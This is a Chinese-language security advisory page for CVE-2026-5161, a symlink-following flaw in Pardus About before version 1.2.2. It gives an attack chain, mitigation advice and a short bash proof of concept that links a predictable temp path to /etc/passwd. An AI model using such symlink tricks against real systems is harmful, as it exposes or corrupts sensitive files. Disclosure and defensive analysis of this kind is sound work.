CVE-2026-5161 CVSS 8.8 高危

CVE-2026-5161 Pardus About符号链接攻击漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5161

漏洞类型

符号链接攻击

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

TUBITAK BILGEM Pardus About

漏洞概述

TUBITAK BILGEM Software Technologies Research Institute开发的Pardus About组件存在安全漏洞。该漏洞源于程序在访问文件前未正确解析链接路径，导致Improper link resolution before file access。受影响的版本为1.2.2之前，攻击者可利用此漏洞进行符号链接攻击，诱导用户交互从而窃取敏感信息或破坏系统完整性。

技术细节

该漏洞属于典型的链接解析错误（CWE-59），具体表现为符号链接攻击。在Pardus About的旧版本中，软件在处理文件操作时，缺乏对符号链接的安全检查机制。攻击者可以利用这一逻辑缺陷，预测程序将要访问的临时文件路径或配置文件路径，并预先在该位置创建一个指向系统敏感文件（如/etc/passwd、/etc/shadow或用户私钥）的符号链接。当程序以特定权限运行并尝试访问该路径时，由于未验证目标文件的真实性，程序会跟随符号链接直接操作被指向的敏感文件。结合CVSS向量（AV:N/AC:L/PR:N/UI:R），攻击者无需认证，仅需通过网络诱导用户进行简单的交互（如点击特定功能），即可触发漏洞。成功利用可能导致高机密性、完整性和可用性影响，例如读取系统机密数据或覆盖关键系统文件。

攻击链分析

STEP 1

侦察

攻击者确认目标系统运行了受影响版本的Pardus About（版本 < 1.2.2）。

STEP 2

准备

攻击者创建恶意符号链接，将该链接指向系统敏感文件（如/etc/passwd）。

STEP 3

投递

攻击者诱导受害者用户在易受攻击的系统上执行特定操作或访问特定界面，触发应用程序的文件访问逻辑。

STEP 4

利用

应用程序跟随符号链接，意外读取或写入敏感系统文件。

STEP 5

影响

导致敏感信息泄露（机密性受损）、系统文件被篡改（完整性受损）或服务中断（可用性受损）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# PoC for CVE-2026-5161: Symlink Attack in Pardus About
# Description: This script demonstrates how a symlink can be created
# to trick the vulnerable application into accessing a sensitive file.

TARGET_FILE="/etc/passwd"
TEMP_DIR="/tmp/vuln_poc"
MALICIOUS_LINK="$TEMP_DIR/pardus_config.tmp"

echo "[*] Setting up PoC environment..."
mkdir -p $TEMP_DIR

echo "[*] Creating symbolic link from $MALICIOUS_LINK to $TARGET_FILE"
ln -s $TARGET_FILE $MALICIOUS_LINK

echo "[*] Triggering the vulnerable application..."
# Simulation: In a real scenario, the user would interact with the app,
# causing it to read $MALICIOUS_LINK thinking it is a safe temp file.
# /usr/bin/pardus-about --config $MALICIOUS_LINK

echo "[*] If exploited, the application may have read/modified $TARGET_FILE"
ls -la $MALICIOUS_LINK

echo "[*] Cleanup"
rm -rf $TEMP_DIR

影响范围

Pardus About < 1.2.2

防御指南

临时缓解措施

在无法立即升级补丁的情况下，建议限制对Pardus About应用程序的交互访问，并监控系统关键文件（如/etc/passwd, /etc/shadow）的异常读写行为。用户应避免在来源不明的环境下运行该软件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5161
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5161
3 Details https://www.cvedetails.com/cve/CVE-2026-5161/
4 VulDB https://vuldb.com/cve/CVE-2026-5161
5 Link https://www.usom.gov.tr/bildirim/tr-26-0131

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表